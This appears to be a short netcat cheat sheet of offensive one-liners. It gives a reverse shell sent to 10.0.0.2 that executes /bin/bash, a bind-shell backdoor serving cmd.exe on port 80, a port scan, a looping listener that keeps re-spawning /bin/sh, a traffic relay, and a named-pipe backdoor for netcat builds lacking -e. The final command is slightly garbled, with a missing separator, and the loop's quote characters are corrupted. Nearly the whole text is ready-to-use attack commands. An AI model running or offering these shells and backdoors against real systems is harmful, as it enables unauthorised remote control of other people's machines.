Connect to a socket on host 192.168.1.1
on TCP port 81
nc 192.168.1.1 81
Listen on the local machine for inbound TCP connections on port 81
nc -nvlp 81
Reverse shell sent to host 10.0.0.2
over TCP port 53
nc 10.0.0.2 53 -e /bin/bash
Backdoor listening on TCP 80 set to execute cmd.exe when connected
nc -nvlp 80 -e cmd.exe
Attempt to connect to each port from 10-90 on 10.0.0.1
, don't resolve any names -n
, don't send any data -z
, and only wait 1 second for a connection -w1
nc -nvzw1 10.0.0.1 10-90
Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc
in a bash true loop is an easy way to work around this, use nohup
also!
while [ 1 ]; do echo βstartedβ; nc -l -p 1234 -e /bin/sh; done
Netcat relay used to forward everything received by the host on TCP 4321 sent to 10.0.0.1
on TCP 8123
nc -l -p 4321 | nc 10.0.0.1 8123
Create a netcat
backdoor without -e
support. This generates a named pipe which is used to funnel data between bash
and nc
.
mknod backpipe p/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe